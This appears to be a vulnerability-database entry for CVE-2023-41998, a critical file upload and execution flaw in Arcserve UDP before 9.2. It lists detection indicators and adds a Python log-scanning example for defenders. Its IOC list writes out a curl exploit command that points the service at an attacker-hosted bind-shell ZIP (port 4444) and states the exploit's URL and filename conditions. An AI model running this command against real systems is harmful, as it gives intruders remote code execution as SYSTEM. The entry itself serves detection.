cbcvebase.
CVE-2023-41998
published 2023-11-27


Priority: P269
Severity: critical, CVSS 3.1 base score 9.8
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 15.27% (96.4th percentile)
Arcserve UDP prior to 9.2 contained a vulnerability in the com.ca.arcflash.rps.webservice.RPSService4CPMImpl interface. A routine exists that allows an attacker to upload and execute arbitrary files.

Affected (2 ranges)

Vendor     Product        Version range   Fixed in
arcserve   arcserve_udp   < 9.2           9.2
arcserve   udp            < 9.2           9.2

Detection & IOCs (extracted from sources)

  path:     \Engine\BIN\patch\
  port:     8014
  url:      https://<target>:8014/RPSWebServiceImpl/services/RPSService4CPMImpl
  filename: shell_bind_tcp.zip
  port:     4444
  command:  curl -ki -H 'Content-Type: text/xml' -d 'http://<attacker>:8000/download/shell_bind_tcp.zip' 'https://<target>:8014/RPSWebServiceImpl/services/RPSService4CPMImpl'
  • Monitor for inbound HTTP POST requests with Content-Type: text/xml to the endpoint /RPSWebServiceImpl/services/RPSService4CPMImpl on port 8014, which is the attack vector for CVE-2023-41998.
  • Alert on new files (especially ZIP and EXE files) appearing under the \Engine\BIN\patch\ directory on Arcserve UDP hosts, as this is the drop location used by the downloadAndInstallPatch() exploit routine.
  • Detect child process execution spawned from the Arcserve UDP Tomcat service (e.g., under C:\Program Files\Arcserve\Unified Data Protection\Common\Tomcat), particularly processes running as NT AUTHORITY\SYSTEM.
  • The exploit requires the download URL to contain at least 4 forward slashes; network proxy/IDS rules can look for outbound HTTP requests from the Arcserve UDP service process to external hosts matching this pattern.
  • The decompressed EXE executed by the service must share the same base filename as the uploaded ZIP (e.g., foo.zip must contain foo.exe); detection rules for dropped files should account for this naming convention.
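The detection points above, turned into a small set of checks that a SOC could run over web-access logs and file-creation events. This is an added example, not code from the source or from Arcserve; the endpoint, port and drop directory are taken from the IOC list, while the log format, host names and sample lines are constructed.

```python
from urllib.parse import urlparse
from pathlib import PureWindowsPath

# Endpoint, port and drop directory come from the IOC list above; the rest is assumed.
RPS_PATH = "/RPSWebServiceImpl/services/RPSService4CPMImpl"
RPS_PORT = 8014
PATCH_DIR_MARKER = "\\engine\\bin\\patch\\"  # compared case-insensitively

def is_rps_request(method: str, url: str, content_type: str) -> bool:
    """Inbound HTTP POST with Content-Type text/xml to the RPS endpoint on port 8014."""
    u = urlparse(url)
    port = u.port or (443 if u.scheme == "https" else 80)
    media_type = content_type.split(";", 1)[0].strip().lower()
    return (method.upper() == "POST" and port == RPS_PORT
            and u.path == RPS_PATH and media_type == "text/xml")

def is_patch_dir_drop(path: str) -> bool:
    """New ZIP or EXE written under \\Engine\\BIN\\patch\\ on an Arcserve UDP host."""
    p = path.lower()
    return PATCH_DIR_MARKER in p and p.endswith((".zip", ".exe"))

def exe_matches_zip(zip_name: str, exe_name: str) -> bool:
    """The executed EXE shares the uploaded ZIP's base name (foo.zip -> foo.exe)."""
    z, e = PureWindowsPath(zip_name), PureWindowsPath(exe_name)
    return (z.suffix.lower() == ".zip" and e.suffix.lower() == ".exe"
            and z.stem.lower() == e.stem.lower())

def has_min_slashes(url: str, minimum: int = 4) -> bool:
    """Download URLs handed to the patch routine carry at least four forward slashes."""
    return url.count("/") >= minimum

# Constructed access-log sample, pipe-separated: time|src|method|url|content-type
SAMPLE_LOG = """\
2023-11-27T10:00:01Z|10.0.0.7|GET|https://udp.example.internal:8014/contextUDP/|text/html
2023-11-27T10:00:05Z|10.0.0.5|POST|https://udp.example.internal:8014/RPSWebServiceImpl/services/RPSService4CPMImpl|text/xml; charset=utf-8
2023-11-27T10:00:09Z|10.0.0.5|POST|https://udp.example.internal:8014/RPSWebServiceImpl/services/RPSService4CPMImpl|application/json
"""

def scan_web_log(text: str) -> list:
    """Return (timestamp, source) pairs for lines matching the CVE-2023-41998 attack vector."""
    hits = []
    for line in text.splitlines():
        ts, src, method, url, ctype = line.split("|", 4)
        if is_rps_request(method, url, ctype):
            hits.append((ts, src))
    return hits

if __name__ == "__main__":
    for ts, src in scan_web_log(SAMPLE_LOG):
        print(f"{ts} {src}: POST text/xml to RPSService4CPMImpl on :8014")
```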